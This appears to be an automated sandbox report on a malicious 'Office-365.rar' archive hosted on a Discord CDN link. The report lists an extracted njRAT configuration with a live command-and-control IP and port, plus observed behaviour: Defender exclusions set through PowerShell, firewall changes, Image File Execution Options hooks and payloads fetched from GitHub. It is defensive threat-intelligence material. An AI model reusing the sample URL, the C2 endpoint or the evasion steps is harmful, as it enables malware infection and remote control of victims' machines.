Analysis
max time kernel: 82s
max time network: 83s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 12-12-2024 18:13
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample
https://cdn.discordapp.com/attachments/1097612223544836197/1316830236247326831/Office-365.rar?ex=675c7939&is=675b27b9&hm=88f64580fbc57e5e15fb335ded817035c026a64f2f2dfa824c029b6334369515&
Resource
win10v2004-20241007-en
General
-
Target
https://cdn.discordapp.com/attachments/1097612223544836197/1316830236247326831/Office-365.rar?ex=675c7939&is=675b27b9&hm=88f64580fbc57e5e15fb335ded817035c026a64f2f2dfa824c029b6334369515&
Malware Config
Extracted
njrat
0.7d
MPG
49.228.131.165:2422
fa6b40864b6c109adbc85023cd1f59d2
reg_key: fa6b40864b6c109adbc85023cd1f59d2
splitter: Y262SUCZ4UJJ
Signatures
-
Njrat family
-
Blocklisted process makes network request 6 IoCs
flow  pid   Process
33    4612  powershell.exe
37    3468  rundll32.exe
38    3468  rundll32.exe
39    1516  powershell.exe
41    2736  rundll32.exe
50    4036  powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
pid   Process
4468  powershell.exe
2736  powershell.exe
4856  powershell.exe
4704  powershell.exe
2708  powershell.exe
4612  powershell.exe
1516  powershell.exe
4036  powershell.exe
Downloads MZ/PE file
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description      ioc  Process
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_ActivationInterval = "120"  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\VerifierFlags = "2147483648"  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\VerifierDebug = "0"  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\KMS_Emulation = "1"  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_RenewalInterval = "10080"  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\KMS_RenewalInterval = "10080"  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\GlobalFlag = "256"  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_RenewalInterval = "10080"  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\GlobalFlag = "256"  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\KMS_ActivationInterval = "120"  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe  reg.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\VerifierDlls = "SppExtComObjHook.dll"  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_Emulation = "1"  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\VerifierFlags = "2147483648"  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_ActivationInterval = "120"  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\KMS_ActivationInterval = "120"  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_HWID = "4187226795851251830"  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe  reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\KMS_RenewalInterval = "10080"  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\KMS_HWID = "4187226795851251830"  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\VerifierDebug = "0"  reg.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe\VerifierDlls = "SppExtComObjHook.dll"  reg.exe
Modifies Windows Firewall 2 TTPs 1 IoCs
pid   Process
3652  netsh.exe
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description        ioc  Process
Key value queried  \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation  setup.exe
Key value queried  \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation  OfficeClickToRun.exe
Key value queried  \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation  OfficeC2RClient.exe
Key value queried  \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation  myprograme.exe
Executes dropped EXE 9 IoCs
pid   Process
2992  myprograme.exe
4152  Csetup.exe
1100  wininitt.exe
4564  wininitt.exe
1648  setup.exe
116   setup.exe
5588  OfficeClickToRun.exe
6004  OfficeClickToRun.exe
5996  OfficeC2RClient.exe
Loads dropped DLL 36 IoCs
pid   Process
2992  myprograme.exe
2992  myprograme.exe
3468  rundll32.exe
2736  rundll32.exe
688   Process not Found
5588  OfficeClickToRun.exe
5588  OfficeClickToRun.exe
5588  OfficeClickToRun.exe
5588  OfficeClickToRun.exe
5588  OfficeClickToRun.exe
5588  OfficeClickToRun.exe
5588  OfficeClickToRun.exe
5588  OfficeClickToRun.exe
5588  OfficeClickToRun.exe
5588  OfficeClickToRun.exe
5588  OfficeClickToRun.exe
5588  OfficeClickToRun.exe
5588  OfficeClickToRun.exe
5588  OfficeClickToRun.exe
5588  OfficeClickToRun.exe
5588  OfficeClickToRun.exe
5588  OfficeClickToRun.exe
6004  OfficeClickToRun.exe
6004  OfficeClickToRun.exe
6004  OfficeClickToRun.exe
6004  OfficeClickToRun.exe
6004  OfficeClickToRun.exe
6004  OfficeClickToRun.exe
6004  OfficeClickToRun.exe
5996  OfficeC2RClient.exe
5996  OfficeC2RClient.exe
5996  OfficeC2RClient.exe
5996  OfficeC2RClient.exe
5996  OfficeC2RClient.exe
5996  OfficeC2RClient.exe
5996  OfficeC2RClient.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow  ioc
37    raw.githubusercontent.com
39    raw.githubusercontent.com
41    raw.githubusercontent.com
50    raw.githubusercontent.com
32    raw.githubusercontent.com
33    raw.githubusercontent.com
Checks system information in the registry 2 TTPs 8 IoCs
System information is often read in order to detect sandboxing environments.
description        ioc  Process
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName  OfficeC2RClient.exe
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer  setup.exe
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName  setup.exe
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer  OfficeClickToRun.exe
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName  OfficeClickToRun.exe
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer  OfficeClickToRun.exe
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName  OfficeClickToRun.exe
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer  OfficeC2RClient.exe
Drops file in System32 directory 13 IoCs
description                   ioc  Process
File created                  C:\Windows\System32\SppExtComObjHook.dll  powershell.exe
File created                  C:\Windows\System32\SppExtComObjHook.dll  powershell.exe
File created                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\301034FC-816C-4335-85C0-7814CB68648E  OfficeClickToRun.exe
File opened for modification  C:\Windows\System32\CatRoot2\dberr.txt  OfficeClickToRun.exe
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db  OfficeClickToRun.exe
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-wal  OfficeClickToRun.exe
File created                  C:\Windows\SysWOW64\D3DX9.dll  myprograme.exe
File opened for modification  C:\Windows\System32\vcruntime143_thread.dll  Csetup.exe
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A  OfficeClickToRun.exe
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A  OfficeClickToRun.exe
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-shm  OfficeClickToRun.exe
File opened for modification  C:\Windows\SysWOW64\D3DX9.dll  myprograme.exe
File created                  C:\Windows\System32\vcruntime143_thread.dll  powershell.exe
Drops file in Program Files directory 64 IoCs
Drops file in Windows directory 5 IoCs
description                   ioc  Process
File created                  C:\Windows\Help\service\wininitt.exe  powershell.exe
File opened for modification  C:\Windows\Help\service  rundll32.exe
File created                  C:\Windows\Help\service\wininitt.exe  powershell.exe
File opened for modification  C:\Windows\Help\service\wininitt.exe  rundll32.exe
File opened for modification  C:\Windows\Help\service  rundll32.exe
Launches sc.exe 13 IoCs
Sc.exe is a Windows utility to control services on the system.
pid   Process
3108  sc.exe
468   sc.exe
4608  sc.exe
4996  sc.exe
1872  sc.exe
6324  sc.exe
3108  sc.exe
2028  sc.exe
664   sc.exe
3592  sc.exe
1560  sc.exe
3592  sc.exe
756   sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description           ioc  Process
Key value enumerated  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh  netsh.exe
Key opened            \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh  netsh.exe
Key queried           \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh  netsh.exe
System Location Discovery: System Language Discovery 1 TTPs 57 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description        ioc  Process
Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0  Integrator.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  Integrator.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  Integrator.exe
Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0  OfficeClickToRun.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  OfficeClickToRun.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  OfficeClickToRun.exe
Delays execution with timeout.exe 1 IoCs
pid   Process
4364  timeout.exe
Enumerates system info in registry 2 TTPs 12 IoCs
description        ioc  Process
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  OfficeClickToRun.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU  OfficeClickToRun.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  chrome.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  chrome.exe
Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  myprograme.exe
Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS  Integrator.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  Integrator.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU  Integrator.exe
Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS  OfficeClickToRun.exe
Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  chrome.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  myprograme.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion  myprograme.exe
Modifies data under HKEY_USERS 64 IoCs
description ioc Process
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation OfficeClickToRun.exe
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs OfficeClickToRun.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|16" OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com OfficeClickToRun.exe
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.9 OfficeClickToRun.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|9" OfficeClickToRun.exe
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.12 OfficeClickToRun.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|12" OfficeClickToRun.exe
Key deleted \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState reg.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|0" OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs OfficeClickToRun.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}\DeviceId = "0018801185E011A6" OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry\Volatile OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ApplicationUpgradeCandidate OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust OfficeClickToRun.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" OfficeClickToRun.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry\Volatile\MsaDevice = "t=GwAWAbuEBAAUbVtUa9wjWgmEIwjX9d7dccnghw8OZgAAECrL545tCgeuprlzGfgPAdjgANPW9QRPyqK3r/a6DlJLdeACJWcBtLKWgjEhhto3P3+UWZzJXYYZOCkrHhsnYhNyNcBpl/MI6T6Atru0wm3m+zUlEK9x2aEjjdAOXiGeIhfYJeKsBkOcpS4xPAb6L0WiyqUr1KKvyfaJDcOxQL0r6UOAw6BqTWwUuOPg8DRToDZ9wWBO1Hul+mVjKCy/1H9AIhAnJ0iVf9bQ0iOjwQDB1yqqr4nAeLkKzcHbORU80RWqJlTaITSNx8Hjmn/TOFw00n2M+roR5iFrhdd9nSB9YA5tEAjLIOLdtunUoJUf92fqHwE=&p=" OfficeClickToRun.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|4" OfficeClickToRun.exe
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.10 OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs OfficeClickToRun.exe
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\LastClean = 70d314b2c14cdb01 OfficeClickToRun.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0 OfficeClickToRun.exe
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.1 OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun OfficeClickToRun.exe
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=1033&build=16.0.18227&crev=3\0\EndDate = 70937edc8a4ddb01 OfficeClickToRun.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=1033&build=16.0.18227&crev=3\0\Url = "https://officeclient.microsoft.com/config16/?syslcid=1033&build=16.0.18227&crev=3" OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates OfficeClickToRun.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers OfficeClickToRun.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|1" OfficeClickToRun.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|6" OfficeClickToRun.exe
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.7
OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs OfficeClickToRun.exe
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\RemoteClearDate = 0040a7e3a36bc901 OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=1033&build=16.0.18227&crev=3 OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=1033&build=16.0.18227&crev=3\0 OfficeClickToRun.exe
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.8 OfficeClickToRun.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\FlightCacheProviderId OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun OfficeClickToRun.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|20" OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot OfficeClickToRun.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|17" OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates OfficeClickToRun.exe
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133785008137280812" chrome.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSessionUpgradeCandidate\officeclicktorun OfficeClickToRun.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=1033&build=16.0.18227&crev=3\Last = "0" OfficeClickToRun.exe
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.13 OfficeClickToRun.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935} OfficeClickToRun.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|2" OfficeClickToRun.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|10" OfficeClickToRun.exe
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.15 OfficeClickToRun.exe
-
Modifies registry class 2 IoCs
description ioc Process
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings chrome.exe
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings myprograme.exe
-
Modifies registry key 1 TTPs 56 IoCs
